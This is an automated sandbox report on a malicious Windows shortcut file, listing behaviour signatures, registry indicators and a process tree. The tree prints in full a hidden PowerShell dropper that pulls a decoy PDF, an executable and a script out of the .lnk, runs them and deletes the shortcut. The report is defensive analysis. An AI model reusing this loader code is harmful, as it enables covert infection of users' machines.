cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13

Analysis

max time kernel
145s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
22-02-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3.lnk
Size

52.0MB
MD5

acf4085b2fa977fc1350f0ddc2710502
SHA1

7155d89bae9acd67f5d8cdf651b73ee6b54262c3
SHA256

cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13
SHA512

4aa010f680485f0241cbaff77d3a21509e2f73c4fdfe1940aa63f46949fcb39404e4a2c543c465098806b7059fab234de48fe9996ba1edd9c4a9b7b6ca1dbe70
SSDEEP

24576:0Zthnqtka+Dj8bI6c94TuDjoZgRXTTYdy830QtO0oIJjW7sFAc1Mh5D2y8:U9OQj85c91wZgjbaJa7d2y8

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation cmd.exe
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1136 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1796 4960 WerFault.exe powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	pid_target	process	target process
1796	4960	WerFault.exe	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

Processes:

powershell.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXE

pid process

2992 NOTEPAD.EXE
4724 NOTEPAD.EXE

pid	process
2992	NOTEPAD.EXE
4724	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exepowershell.exeAcroRd32.exe

pid	process
1136	powershell.exe
1136	powershell.exe
4960	powershell.exe
4960	powershell.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1136 powershell.exe
Token: SeDebugPrivilege 4960 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

4712 AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

AcroRd32.exeScreenClippingHost.exeOpenWith.exe

pid	process
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
4712	AcroRd32.exe
1816	ScreenClippingHost.exe
4572	OpenWith.exe
4572	OpenWith.exe
4572	OpenWith.exe
4572	OpenWith.exe
4572	OpenWith.exe
4572	OpenWith.exe
4572	OpenWith.exe
4572	OpenWith.exe
4572	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execsc.execmd.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 4540 wrote to memory of 4620	4540	cmd.exe	cmd.exe
PID 4540 wrote to memory of 4620	4540	cmd.exe	cmd.exe
PID 4540 wrote to memory of 4620	4540	cmd.exe	cmd.exe
PID 4620 wrote to memory of 3164	4620	cmd.exe	cmd.exe
PID 4620 wrote to memory of 3164	4620	cmd.exe	cmd.exe
PID 4620 wrote to memory of 3164	4620	cmd.exe	cmd.exe
PID 4620 wrote to memory of 1136	4620	cmd.exe	powershell.exe
PID 4620 wrote to memory of 1136	4620	cmd.exe	powershell.exe
PID 4620 wrote to memory of 1136	4620	cmd.exe	powershell.exe
PID 1136 wrote to memory of 2628	1136	powershell.exe	csc.exe
PID 1136 wrote to memory of 2628	1136	powershell.exe	csc.exe
PID 1136 wrote to memory of 2628	1136	powershell.exe	csc.exe
PID 2628 wrote to memory of 4864	2628	csc.exe	cvtres.exe
PID 2628 wrote to memory of 4864	2628	csc.exe	cvtres.exe
PID 2628 wrote to memory of 4864	2628	csc.exe	cvtres.exe
PID 1136 wrote to memory of 4712	1136	powershell.exe	AcroRd32.exe
PID 1136 wrote to memory of 4712	1136	powershell.exe	AcroRd32.exe
PID 1136 wrote to memory of 4712	1136	powershell.exe	AcroRd32.exe
PID 1136 wrote to memory of 1216	1136	powershell.exe	cmd.exe
PID 1136 wrote to memory of 1216	1136	powershell.exe	cmd.exe
PID 1136 wrote to memory of 1216	1136	powershell.exe	cmd.exe
PID 1216 wrote to memory of 4960	1216	cmd.exe	powershell.exe
PID 1216 wrote to memory of 4960	1216	cmd.exe	powershell.exe
PID 1216 wrote to memory of 4960	1216	cmd.exe	powershell.exe
PID 4712 wrote to memory of 3912	4712	AcroRd32.exe	RdrCEF.exe
PID 4712 wrote to memory of 3912	4712	AcroRd32.exe	RdrCEF.exe
PID 4712 wrote to memory of 3912	4712	AcroRd32.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe
PID 3912 wrote to memory of 2172	3912	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\3.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
2⤵
- Suspicious use of WriteProcessMemory
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
3⤵
PID:3164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1vugo5bs\1vugo5bs.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3BFF.tmp" "c:\Users\Admin\AppData\Local\Temp\1vugo5bs\CSCBCFC720FF2214997A885EA3C914BFBCE.TMP"
5⤵
PID:4864

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\3.pdf"
4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4712

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
- Suspicious use of WriteProcessMemory
PID:3912

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=10147800BF0701C1B5CA99D3E033F0ED --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:2172

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=97CBC693234AEE75B4CECF43070DCD53 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=97CBC693234AEE75B4CECF43070DCD53 --renderer-client-id=2 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job /prefetch:1
6⤵
PID:2632

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EF42A8633D3FFF49C77282FBC7942967 --mojo-platform-channel-handle=2192 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:2956

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B256287874944F7605B010DEAFE36861 --mojo-platform-channel-handle=2416 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:1668

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2CCFD3346B25C65916DBA6AD2F7AFF98 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2CCFD3346B25C65916DBA6AD2F7AFF98 --renderer-client-id=6 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job /prefetch:1
6⤵
PID:4032

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EBCE00CEB521CCB00214EE83E7C22059 --mojo-platform-channel-handle=2916 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rq401l4c\rq401l4c.cmdline"
6⤵
PID:2824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75EB.tmp" "c:\Users\Admin\AppData\Local\Temp\rq401l4c\CSC6FD7A76C3B594BBCA682EE27DD757F5B.TMP"
7⤵
PID:2792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beyhbg23\beyhbg23.cmdline"
6⤵
PID:3840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES76A7.tmp" "c:\Users\Admin\AppData\Local\Temp\beyhbg23\CSC20479408179D456BA0F82A785B372A6B.TMP"
7⤵
PID:2152

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qnbx3f2p\qnbx3f2p.cmdline"
6⤵
PID:3600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7724.tmp" "c:\Users\Admin\AppData\Local\Temp\qnbx3f2p\CSC40EA288CEF384137B4C5E8F2FDBDA9B.TMP"
7⤵
PID:4336

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nagvesae\nagvesae.cmdline"
6⤵
PID:2056

